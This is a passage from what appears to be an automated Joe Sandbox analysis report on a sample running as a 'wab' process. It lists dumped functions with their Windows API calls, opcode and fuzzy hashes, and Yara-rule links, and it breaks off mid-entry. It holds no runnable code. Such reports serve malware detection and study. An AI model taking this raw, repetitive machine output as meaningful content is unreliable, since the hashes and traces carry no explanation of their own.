                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: 0d059ad067989d1f17bbe0e8521da585270b5c486309d81f35087ee814750848
                                                                                                                                                                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d059ad067989d1f17bbe0e8521da585270b5c486309d81f35087ee814750848
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                                                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: ae9121cd3f31e53c53ee8718461166e7ff51970557038cf83ea6e416d6b4654c
                                                                                                                                                                                                                    • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae9121cd3f31e53c53ee8718461166e7ff51970557038cf83ea6e416d6b4654c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                                                                                                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3655998216-0
                                                                                                                                                                                                                    • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00415B2C Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                                                                                                                                                    • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1828521557-0
                                                                                                                                                                                                                    • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406942
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 609303285-0
                                                                                                                                                                                                                    • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0042BF4C Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0042BFC0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2221118986-0
                                                                                                                                                                                                                    • Opcode ID: d862e32a939509622375779d89030e7c5c19454b043fdde8bb361d8650d0c47c
                                                                                                                                                                                                                    • Instruction ID: 98d7c88e32de7b71128496fa216618f30369d33ff21347cb3a36463818225643
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d862e32a939509622375779d89030e7c5c19454b043fdde8bb361d8650d0c47c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7012B327009226BD700AB29AC41A4AB3D8EFD4314B16402FF508D7341EF78EC114BD8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2136311172-0
                                                                                                                                                                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1936579350-0
                                                                                                                                                                                                                    • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                    • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                    • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2565263379-0
                                                                                                                                                                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
